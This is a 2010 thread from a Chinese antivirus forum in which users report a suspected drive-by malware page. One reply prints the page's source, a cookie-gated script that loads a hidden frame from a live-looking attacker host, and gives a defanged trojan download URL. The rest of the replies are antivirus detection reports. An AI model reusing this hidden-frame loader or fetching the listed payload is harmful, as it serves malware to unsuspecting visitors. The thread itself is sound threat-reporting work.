楼主: guojun165
收起左侧

[已鉴定] 怀疑是被挂马了 小a报警

[复制链接]
lianyeguzhou
发表于 2010-9-18 18:44:13 | 显示全部楼层
我这里小a无反应
幸福的猪猪
发表于 2010-9-19 06:00:57 | 显示全部楼层
本帖最后由 幸福的猪猪 于 2010.9.19 06:09 编辑

点击某美化包之后,出现下载页面。(不过,其好像做了特殊处理。如果用redoce解析下载页面的话,获取不到有关挂马页面的信息。用IE自带的“源文件”查看,就可以看出猫腻了。下面为其的源代码:
  1. <html>
  2. <head>
  3. </head>
  4. <script>
  5. function showme()
  6. {
  7. var CK=document.cookie;
  8. var sa=CK.indexOf("CK");
  9. if(sa!=-1){}else{var EP=new Date();
  10. EP.setTime(EP.getTime()+24*60*60*1000);
  11. document.cookie="CK=test;expires="+EP.toGMTString();
  12. self.hi.location="http://j789o.3322.org:6677/m/index.html";}
  13. }
  14. </script>
  15. <frameset rows="100%,*">
  16. <frame name="hello" src="/fengjing/huahui.html?UpdatedPage=aGlqYWNr">
  17. <frame name="hi" src="">
  18. </frameset>
  19. </html>
复制代码


木马程序下载地址:

hxxp://147gh0.3322.org:6677/m/gho.exe

夜火燎原
发表于 2010-9-19 07:39:25 | 显示全部楼层
额~~我的小A~诺顿和网盾都木有反应啊~
langzi2009
发表于 2010-9-19 08:12:48 | 显示全部楼层
诺顿2011 没有反应 估计是误报了
黑羽
发表于 2010-9-19 18:31:54 | 显示全部楼层
卡巴拦截。。
flw54321
发表于 2010-9-19 18:50:55 | 显示全部楼层
nod32在TW chrome打开网页时无反应 ,下载hxxp://147gh0.3322.org:6677/m/gho.exe有反应了
yujiakun
头像被屏蔽
发表于 2010-9-22 10:45:03 | 显示全部楼层
确实是
黑羽
发表于 2010-9-22 11:24:35 | 显示全部楼层
卡巴和360拦截
A1101536336
发表于 2010-9-22 11:34:50 | 显示全部楼层
诺顿
etdm
发表于 2010-9-25 05:07:06 | 显示全部楼层
趋势报警···
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-19 13:00 , Processed in 0.113434 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表